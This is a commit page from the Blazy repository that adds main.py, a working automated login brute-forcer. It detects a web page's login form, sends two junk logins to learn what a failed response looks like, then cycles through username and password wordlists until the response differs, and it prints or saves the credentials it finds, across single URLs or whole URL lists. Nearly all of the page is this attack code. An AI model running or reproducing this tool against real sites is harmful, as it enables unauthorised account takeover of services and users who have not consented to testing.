s0md3v/Blazy
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

rewritten

Browse Source
This commit is contained in:
Somdev Sangwan
2022-11-28 23:24:13 +05:30
parent 0fc9a54341
commit 347ab20a37
28 changed files with 387 additions and 946 deletions
Download Patch File Download Diff File Expand all files Collapse all files

116
main.py Normal file
View File

@@ -0,0 +1,116 @@
"""
We are creating a login bruteforcer that works
on any given webpage without any manual user input, just a url.
"""
import re
import sys
import argparse
import core.config as mem
from core.output import json_output
from core.requester import requester
from urllib.parse import urlparse
from core.anamoly import define, compare
from core.parser import get_login_form
from core.utils import prepare_request, identify_fields
from core.colors import green, end
parser = argparse.ArgumentParser()
parser.add_argument('-i', help='all kind of input', dest='input')
parser.add_argument('-oJ', help='all kind of input', dest='json_output')
parser.add_argument('-t', help='http timeout', dest='timeout', default=10)
args = parser.parse_args()
mem.var = vars(args)
print("\n blazy 0.2.0\n")
usernames = []
passwords = []
def gen_payload(username, password, location, inputs):
payload = {}
for input_obj in inputs:
if input_obj['name'] == location['password']:
payload[input_obj['name']] = password
elif input_obj['name'] == location['username']:
payload[input_obj['name']] = username
else:
payload[input_obj['name']] = input_obj['value']
payload['form'] = 'submit'
return payload
def bruteforce(url, inputs, locations, factors):
payload = {}
for user in usernames:
for password in passwords:
payload = gen_payload(user, password, locations, inputs)
response = requester(url, payload)
if compare(response, factors) != "":
return user, password, payload
return user, password, payload
def process_url(url):
html = requester(url).text
login_form = get_login_form(html)
if not login_form:
return '', '', ''
full_url = prepare_request(url, login_form)
locations = identify_fields(login_form['inputs'])
payload_1 = gen_payload("gsdug", "zf89h.eVui", locations, login_form['inputs'])
response_1 = requester(full_url, payload_1)
payload_2 = gen_payload("djgug", "zf59h.eBux", locations, login_form['inputs'])
response_2 = requester(full_url, payload_2)
factors = define(response_1, response_2)
return bruteforce(full_url, login_form['inputs'], locations, factors)
def init_db():
with open('./db/usernames.txt', 'r') as usernames_file:
for line in usernames_file:
usernames.append(line.rstrip('\n'))
with open('./db/passwords.txt', 'r') as usernames_file:
for line in usernames_file:
passwords.append(line.rstrip('\n'))
def main():
init_db()
if re.search("^https?://", mem.var['input']):
username, password, result = process_url(mem.var['input'])
if mem.var['json_output']:
output = json_output(result)
if mem.vars['json_output'] == '-':
print(output)
quit()
with open(mem.var['json_output'], 'a+') as json_file:
json_file.write(output + "\n")
else:
with open(mem.var['input'], 'r') as url_file:
count = 0
for line in url_file:
count += 1
print("Progress: %i" % count, end="\r")
url = line.rstrip('\n')
if re.search("^https?://", url):
username, password, result = process_url(url)
if not username:
continue
if mem.var['json_output']:
output = json_output(result)
if mem.var['json_output'] == '-':
print(output)
quit()
with open(mem.var['json_output'], 'a+') as json_file:
json_file.write(output + "\n")
else:
print("%s>>%s %s" % (green, end, url))
print(" %suser:%s %s" % (green, end, username))
print(" %spass:%s %s" % (green, end, password))
if __name__ == '__main__':
main()